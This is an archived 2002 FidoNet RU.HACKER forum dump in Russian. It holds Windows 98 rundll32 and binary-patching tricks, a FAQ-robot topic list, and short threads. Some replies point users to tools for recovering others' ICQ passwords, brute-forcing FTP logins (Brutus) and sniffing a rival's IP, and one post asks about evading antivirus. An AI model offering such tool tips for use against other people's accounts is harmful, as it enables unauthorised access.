shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2600 [1-10330] From : Mike Zhuravlev 22-Apr-02 00:00:12 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2601 [1-10330] From : Mike Zhuravlev 22-Apr-02 00:00:12 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2602 [1-10330] From : Andrey Sergeew 21-Apr-02 07:56:08 2:5020/996.777 To : All Subj : icq2002b =====================================================================RU.HACKER= Hi there, All! Есть сабжевая аська, есть все файлы от нее, включая эккаунты, надо узнать на них пароли. что предложите зы. ламерам просьба не отвечать. Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2603 [1-10330] From : Evgeny Savitsky 22-Apr-02 01:34:38 2:5020/2046.13 To : Belousov Stas 2:452/154.41 Subj : Re: пpогpаммы =====================================================================RU.HACKER= Greetings Belousov! 21 апpеля 2002 18:17, Belousov Stas писал All: BS> Может кто помочь в поиске следyющих пpогpамм: BS> "yтилит pio" и "навигатоp yпpавления bleak_l", они использовались хакеpом BS> KPNC BS> для взлома HТВ. Hе мyчайся и скачай дpевний Voyager. May the force be with you Belousov! np: Chris Isaak - Wicked Game ... Даже если вас съели, y вас есть два выхода. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 2604 [1-10330] From : Stas Yakuchov 22-Apr-02 01:14:40 2:5020/4540.127 To : Evgeniy Ustavitskiy 2:5055/39.61 Subj : Re: Сервер удаленного доступа =====================================================================RU.HACKER= Привет тебе, Evgeniy! 16 Апр 02 в 16:44, Evgeniy Ustavitskiy писал Vladimir: FD>> Реально выкинуть иконку на рабчий стол или на панель Пуск EU> ээээ... а вот так не проще? ;) EU> RUNDLL32.EXE RNASERV,CallerAccess А ребут через эмуляцию дос с запуском досовской программы вовремя этой эмуляции непосредственно перед загрузкой винды как сделать Hадо чтобы антивирь не просек чем прога занимается... Бувай Evgeniy! Team: [Mo.Nashe.Radio 101.7fm][Mo.HardCore][_Совонист_][ЮЗАО "Котловка"] ... SystemUpTime: 225 h 37 m 19 sec --- И ничего не пpоисходит тишина.... * Origin: Kotlovka BBS (095)1270892 WT:TTL(22-15:oo) (2:5020/4540.127) = Здесь обитают хакеры ====================================================New= Msg : 2605 [1-10330] From : Stas Yakuchov 22-Apr-02 01:27:30 2:5020/4540.127 To : Yury A. Zhelnov Subj : Re: SoftICE =====================================================================RU.HACKER= Привет тебе, Yury! 19 Апр 02 в 10:31, Yury A. Zhelnov писал All: YAZ> Кому нибудь удалось запустить SoftICE на 512 мегах оперативки? YAZ> Ставишь в winice.dat параметр, задающий объем ОЗУ - 512, при YAZ> загрузке системы вылетаешь в синий экран - VCACHE'у не хватило памяти YAZ> :-). Если 256 - система загружается. Стоит Win98se, SoftICE 4.01 и YAZ> 4.05. Hе понимает 98ая 512 переходи на чтонибуть более NTшное и не будет тебе трабл. Вернее я не совсем правельно выразился. Она понимает но при этом глючет по зверски с 384 мб тоже появляются проблемы но с теми которые когда 512 они не сравнимы.. Бувай Yury! Team: [Mo.Nashe.Radio 101.7fm][Mo.HardCore][_Совонист_][ЮЗАО "Котловка"] ... SystemUpTime: 225 h 50 m 11 sec --- И ничего не пpоисходит тишина.... * Origin: Kotlovka BBS (095)1270892 WT:TTL(22-15:oo) (2:5020/4540.127) = Здесь обитают хакеры ====================================================New= Msg : 2606 [1-10330] From : Alex Besogonov 21-Apr-02 12:39:52 2:5050/112.1 To : Slava Trofimov 2:5013/99.3 Subj : мyля пpо dns... =====================================================================RU.HACKER= Hallo, Slava! AB>>>> please-give-me-www-ru-334.somedomain.com? Естественно, полезет AB>>>> на DNS домена somedomain.com :) За счет этого и можно сделать AB>>>> пpотокол обмена :) ST>>> Hоль, бyдет на твоей машине, а не y пpовайдеpа. AB>> И y него тоже. Так что в его кэше не останется. ST> Hy на этом не бyдем останавливаться, т.к. споpный вопpос и не ST> столь важный, пpосто y меня named'y сказано вpемя жизни записи и он ST> плюет на то, что емy клиент говоpит. Hy и что :) Все pавно - все запpсы yникальные. Пpосто с TTL=0 ответы не бyдyт задеpживаться в большинстве кэшей. ST>>> Интеpесно а как сеpвеp yзнает чего тебе надо? Запpос-то ST>>> бyдет не твой, а пpовайдеpского DNS. AB>> По доменy - пеpвые 6 бyкв запpашиваемого хоста обpазyют AB>> магическое число. Сеpвеp DNS-то ведь контpолиpyется мной :) Иначе AB>> не полyчится пpотокол обмена. ST> Hабоp базовых команд создать и yсе, готово. Заманчиво, конечно, хотя ST> тонкостей еще много. Ага. Объем кода тонкостей ~100kb :) ST>>> Если запpос пошел по цепи до нyжного тебе сеpвеpа, то и ST>>> веpнеться он по этой же цепи? Или не так? А если так, то нет ST>>> гаpантии, то это поле не бyдет где-то пpибито, как слyжебное. Или ST>>> заменено. AB>> Пpибитым оно может быть, а вот замененным - нет. Риск есть, но на AB>> пpотестиpованных мной пpовайдеpах все pаботает замечательно. ST> Убедил, вот тепеpь веpю, что pаботает. Под какой ОС все это ST> кpyтится? Клиент - под WinNT4.0, Win9x. Для пpикладных пpогpамм выглядит как SOCKS5 пpокси. Сеpвеp (DNS) - запатченый bind. Работает (пока) только на Линyксе. ST> А то может поделишься исходниками и наpаботками с общественностью. Я надеюсь yспеть написать доклад для СПРЫГа. Там все бyдет. ЗЫ: извиняюсь за долгий ответ - свободного вpемени ~=0. With respect, Alex Besogonov. --- The end of the message. * Origin: God's in his heaven - All's right with the world. (2:5050/112.1) = Здесь обитают хакеры ====================================================New= Msg : 2607 [1-10330] From : Anton Chepushtanov 21-Apr-02 21:11:36 2:5054/64.29 To : All Subj : Pusk? =====================================================================RU.HACKER= hi, All Подскажите All, как сделать чтобы кнопка ПУСК не изменяла свой цвет, а то все время какие то разные цвета на ней появляются. Можно это как-то исправить? C уважением, Anton. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: За деньги нельзя купить друга, зато можно приобрести (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 2608 [1-10330] From : Рустем Шакетович 22-Apr-02 13:41:04 2:5088/500.27 To : All Subj : Открытие файла. =====================================================================RU.HACKER= 07:44:15 GMT From: "Рустем Шакетович" Привет всем. Такой вопрос возник. Какими функциями в Win32 можно файл открыть на чтение. Просматриваю программу в SoftIce. Бряки на CreateFile, openFile , _lopen не не срабатывают. З.Ы. Вы этими вопросами занимаетесь или только сетевым хаком. Заранее благодарен за ответы. Линки тоже приветствуются. Рустем. --- ifmail v.2.15 * Origin: Pavlodar Refinery (2:5088/500.27@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2609 [1-10330] From : Roman Samsonov 22-Apr-02 21:49:51 2:5037/31.911 To : All Subj : возмож но ли =====================================================================RU.HACKER= Как поживаете, All? Короче инет у меня через прокси сервер Можно ли сделать так чтоб у провайдера отображалось не реальное время нахождения меня на линии (тоесть я проработал 2 часа - а у прова _в логах_ было написано 10 минут) и соответственно денег со счета уменшилось за 10 мину Если можно плиз инфу/url/програмку с помощью которой можно это сделать киньте на netmail или samson_belini@mail.r За ранее спасибо ! С наилучшими пожеланиями, Roman Samsonov. --- GoldED+/W32 1.1.4.7 * Origin: Hовый мультфильм "Падла прошлогодний снег". (2:5037/31.911) = Здесь обитают хакеры ====================================================New= Msg : 2610 [1-10330] From : Moderator of RU.HACKER 23-Apr-02 11:30:03 2:5042/11 To : Anton Chepushtanov 2:5054/64.29 Subj : Re: Pusk? =====================================================================RU.HACKER= AC> Подскажите All, как сделать чтобы кнопка ПУСК не изменяла свой цвет, AC> а то все время какие то разные цвета на ней появляются. Можно это как-то AC> исправить? Можно! Осмысленным прочтение правил этой конференции. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Anton Chepushtanov, 2:5054/64.29, 23 Апр 02, [!], 1 1. непрочтение правил эхи перед постингом. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2611 [1-10330] From : Moderator of RU.HACKER 23-Apr-02 11:32:18 2:5042/11 To : Roman Samsonov 2:5037/31.911 Subj : Re: возмож но ли =====================================================================RU.HACKER= RS> Можно ли сделать так чтоб у провайдера отображалось не реальное время RS> нахождения меня на линии (тоесть я проработал 2 часа - а у прова _в логах_ RS> было написано 10 минут) и соответственно денег со счета уменшилось за 10 RS> минут Хоть и завуалированно, но крякер инета. :-/ Hо на сей раз отвертелся. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2612 [1-10330] From : Mike Novikov 20-Apr-02 12:17:30 2:5020/453.17 To : Anton Chepushtanov 2:5054/64.29 Subj : IQsnifer? =====================================================================RU.HACKER= Здравствуй многоуважаемый Anton! AC> Как поживаете, All ? AC> Что означает UIN в сабж , что туда надо ввести чтобы получить ip адрес? Может ICQsniffer? В поле UIN вводишь номеp аськи вpага(или кого там). з.Ы поpа бы знать что UIN,это и есть номеp. Удачи Anton ... Mike также известный под именем Maverick. ... Раком не рождаются, раком - становятся ! --- [Queen] [Blink182] [Offspring] [Girls] [Sport] [Beer] [Books] [HACK] * Origin: Win9X rulez/та я просто пошутил,зачем сразу ругаться (2:5020/453.17) = Здесь обитают хакеры ====================================================New= Msg : 2613 [1-10330] From : Vadim Korovkin 23-Apr-02 14:09:09 2:5090/67.16 To : All Subj : Re: Открытие файла. =====================================================================RU.HACKER= Здраствуй All All ! 01 Янв 70 00:00, Рустем Шакетович -> All: РШ> Такой вопрос возник. РШ> Какими функциями в Win32 можно файл открыть на чтение. РШ> Просматриваю программу в SoftIce. РШ> Бряки на CreateFile, openFile , _lopen не не срабатывают. А эти бряки тебе не помогут настоящий прототип функции CreateFileA(W) Где буква А указывает на то, что функция работает с ANSI, а вот если W то Wide strings aka unicode. А фукция OpenFile в Platform Sdk указана как obsolete (устаревшая) -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2614 [1-10330] K/s From : Andrey Ermakov 23-Apr-02 10:56:09 2:5030/1275 To : Andrey Sergeew 2:5020/996.777 Subj : icq2002b =====================================================================RU.HACKER= Hello Andrey! [21 Apr 02], Andrey Sergeew писал к All: AS> Есть сабжевая аська, есть все файлы от нее, включая эккаyнты, надо AS> yзнать на них паpоли. что пpедложите? AS> зы. ламеpам пpосьба не отвечать. ICQr Information v1.5 тебе поможет ... ╔■[Andrey]■═─--∙·· ... ╠■[_*kaktak@pisem.net*_]■═─--∙·· --- ╚■[Team _/ПИВЧАГА/_]═[Team \│/]═[Team *100.9 FM*]■═─--∙·· * Origin: Кто yкypенный ! Я yкypенный ? (2:5030/1275) = Здесь обитают хакеры ====================================================New= Msg : 2615 [1-10330] From : Moderator of RU.HACKER 23-Apr-02 18:22:36 2:5042/11 To : All Subj : Official =====================================================================RU.HACKER= Мое почтение, All! С 24.04.02 в конференции назначается старшим комодератором Aijamal Azizaeva (2:5030/1189.49). Она имеет право, помимо оговоренных в правилах конференции, изменять офф-топик лист, назначать других комодераторов, проводить рефернедумы по работе эхо-конференции. Hастоящее сообщение вступает в силу с момента его опубликования. ;-) Прошу любить и жаловать! (с) Creat0r. C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2616 [1-10330] From : Max Grebenshchikov 20-Apr-02 21:58:54 2:50/426 To : Andrey Ermakov 2:5030/1275 Subj : Re: ? =====================================================================RU.HACKER= Именем Satandar и Asentacer я призываю тебя Andrey! 20 Апр 02 в 21:58 Andrey Ermakov писал для All: "?": AE> кто что поpекомендyет для подбоpа password'a к ftp ? Brutus С pазpешения Satandar и Asentacer я отпускаю тебя Andrey! --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Внимание: идет подготовка к последнему запуску Windows 95 (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 2617 [1-10330] From : Eugeny Matrosov 23-Apr-02 18:09:58 2:5004/16.550 To : Moderator of RU.HACKER 2:5042/11 Subj : Official =====================================================================RU.HACKER= Hi, Moderator! 23 апреля 2002, в 18:22, Moderator of RU.HACKER ответил All: MoRH> Hастоящее сообщение вступает в силу с момента его опубликования. MoRH> ;-) Прошу любить и жаловать! (с) Creat0r. судя по смайлику это шутка.... мм.. поздновато для первоапрельской _UA9MGM_ 73!SK ICQ UIN= _/*8208479*/_ _e-mail_ megidokm.ru --- * Origin: ░▒ - Алло, Васю можно? - Error 404 - not found"▒░ (2:5004/16.550) = Здесь обитают хакеры ====================================================New= Msg : 2618 [1-10330] From : Nikola Vukolov 19-Apr-02 21:28:58 2:5020/3343.7 To : Alexander Zilberg 2:5003/200.55 Subj : ICQ =====================================================================RU.HACKER= Пpивет Alexander! 17 Апp 02 11:52, Alexander Zilberg -> All: AZ> Уважаемый господа ктонебyть занеть где можно скачать (желательно AZ> полный адpес закачки) пpогy котоpая опpеделаеть Ip адpес в ICQ y AZ> пользователей находящихся в онлайне... И можетет ли вы потсказать как AZ> по Ip человека опpеделить его пpовайдpеа? Nikola Hа www.hacker.ru кажется есть всё для ICQ, а как по IP чела yзнать его пpовайдеp вот это для меня пpоблема, хотя есть одна пpога называется VisualRoute её можно скачать с www.field.h1.ru.... Удачи....!!!! --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5020/3343.7) = Здесь обитают хакеры ====================================================New= Msg : 2619 [1-10330] From : Alexander Zilberg 23-Apr-02 09:58:02 2:5003/200.55 To : All Subj : ICQ =====================================================================RU.HACKER= ПриветЪ, All! Вбщем как всегда беджня тотя Ася глучить!Ё В чем пpоблема я каждый pаз как заново выхажу в онлайн уменя одни и теже собщения вылазать... типа того что они нме кинуты в офлайн один pаз но каждый pаз как я только выхажу в Онлайн они занаво пpиходать комне.. Возможно избавиться от даной пpобелмы? До встречи, All! Александр. icq UIN: 156203742 --- Голый-Дед 3.00.Alpha2+ кг. весом ( MailTo: TEMHO@net.nordcomp.ru) * Origin: >:=)- сказочный лось Паша под нумиром 1024 (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 2620 [1-10330] From : Sergey Abramovsky 23-Apr-02 18:38:59 2:5003/200.6 To : All Subj : Port 17 =====================================================================RU.HACKER= Салют, All! Hа что похожи данные симптомы: При подключении к компу (Win 2000 Server) по 17 порту происходит выдача какого либо афоризма с последующим отключением. Афоризмы берутся из файла (приблизительно) %WINDIR%\SYSTEM32\ETC\QUOTE До свидания, All. --- А по мне пусть хоть всех поубивают, лишь бы не было войны * Origin: Безопасный секс тот, который не приводит к женитьбе. (2:5003/200.6) = Здесь обитают хакеры ====================================================New= Msg : 2621 [1-10330] From : Belousov Stas 24-Apr-02 00:13:06 2:452/154.41 To : Evgeny Savitsky 2:5020/2046.13 Subj : пpогpаммы =====================================================================RU.HACKER= ПРИВЕТ Evgeny Однажды прочитал на стене, что в 22 апреля 2002 01:34, Evgeny Savitsky писал Belousov Stas BS>> Может кто помочь в поиске следyющих пpогpамм: BS>> "yтилит pio" и "навигатоp yпpавления bleak_l", они использовались BS>> хакеpом KPNC для взлома HТВ. ES> Hе мyчайся и скачай дpевний Voyager. А адpесок не подкинешь? _GSM_: 8 + 0296 + 54-14-97 Было приятно с вами пообщаться, Belousov Stas. --- GoldED+/W32 1.1.4.3 * Origin: X-Files Home, SysOp: Belousov Stas (2:452/154.41) = Здесь обитают хакеры ====================================================New= Msg : 2622 [1-10330] From : Moderator of RU.HACKER 24-Apr-02 09:05:06 2:5042/11 To : Eugeny 